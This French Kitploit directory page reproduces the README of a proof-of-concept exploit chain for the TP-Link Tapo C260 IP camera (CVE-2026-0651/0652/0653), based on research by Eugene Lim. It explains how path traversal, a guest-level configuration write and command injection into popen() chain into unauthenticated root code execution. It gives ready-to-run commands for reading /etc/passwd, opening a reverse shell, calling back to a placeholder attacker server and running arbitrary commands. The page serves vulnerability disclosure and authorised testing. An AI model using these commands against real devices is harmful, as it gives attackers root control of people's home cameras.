Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
tapo-c260-rce — Chaîne d'exploitation PoC pour la caméra TP-Link Tapo C260 — CVE-2026-0651/0652/0653. Recherche par @spaceraccoon. | Kitploit
Outils/GitHubGitHub/l0lsec/tapo-c260-rce
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebHacking MatérielTests d'IntrusionCommandement et ContrôleSécurité Matériel et IoTAnalyse de Micrologiciel
2334il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
l0lsec/tapo-c260-rce

tapo-c260-rce

Chaîne d'exploitation PoC pour la caméra TP-Link Tapo C260 — CVE-2026-0651/0652/0653. Recherche par @spaceraccoon.

Voir le dépôt

Chaîne RCE Tapo C260 (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

Preuve de concept d'une chaîne d'exploitation pour la caméra IP TP-Link Tapo C260 permettant d'obtenir une RCE de non-authentifié à root en enchaînant trois vulnérabilités découvertes par Eugene Lim (Spaceraccoon).

Crédits

Toutes les recherches et découvertes de vulnérabilités par Eugene Lim (@spaceraccoon).

Ce dépôt est une implémentation de PoC basée sur son article public. Si vous trouvez cela utile, achetez son livre : From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press).

Chaîne de vulnérabilités

CVETypeImpact
CVE-2026-0651Traversée de chemin / Divulgation de fichiers locauxLecture de fichiers arbitraires via /%2e%2e%2f dans le gestionnaire HTTP GET
CVE-2026-0652Écriture de configuration arbitraireLes utilisateurs de niveau invité peuvent écrire dans n'importe quel chemin de configuration via la manipulation de clés JSON dans l'API cloud
CVE-2026-0653Injection de commande / Élévation de privilègesset_region_code_handle transmet la valeur de configuration dev_name non assainie à popen()

Chaîne d'attaque

LFD (lecture de la configuration de l'appareil) --> Écriture de configuration (empoisonnement de dev_name) --> Déclenchement du gestionnaire de code de région --> popen() --> shell

Prérequis

  • Python 3.8+
  • Accès réseau à la caméra (pour la LFD) ou un jeton d'authentification cloud TP-Link valide (pour la RCE)
  • Des identifiants de niveau invité suffisent pour la chaîne complète

Installation

git clone https://github.com/<vous>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

Utilisation

Divulgation de fichiers locaux (CVE-2026-0651)

Lire des fichiers arbitraires depuis une caméra sur le réseau local :

python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

Chaîne RCE complète (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

# Shell inversé
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <VOTRE_IP> \
  --lport 4444

# Rappel uniquement (ping curl)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://votre-serveur.com/pwned

# Commande personnalisée
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

Comment ça fonctionne

  1. Empoisonnement — Envoie une requête setLedStatus avec des clés JSON manipulées qui écrit une charge utile de métacaractères shell dans le chemin de configuration tp_manage/info/dev_name sur l'appareil.

  2. Déclenchement — Envoie une requête set_region_code. Le gestionnaire lit dev_name depuis la configuration et l'interpole dans un appel popen() sans assainissement, exécutant la commande injectée.

  3. Shell — L'attaquant reçoit un rappel ou un shell inversé.

Firmware concerné

  • TP-Link Tapo C260 (firmware non corrigé)
  • Potentiellement d'autres modèles Tapo partageant le même binaire omnibus /bin/main

Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et d'éducation. L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs ne sont pas responsables d'une mauvaise utilisation. Obtenez toujours une autorisation explicite avant de tester un appareil qui ne vous appartient pas.

Références

  • Article original — Spaceraccoon
  • Recherche sur le protocole Tapo de Kennedn
  • Avis de sécurité TP-Link
Télécharger l’outil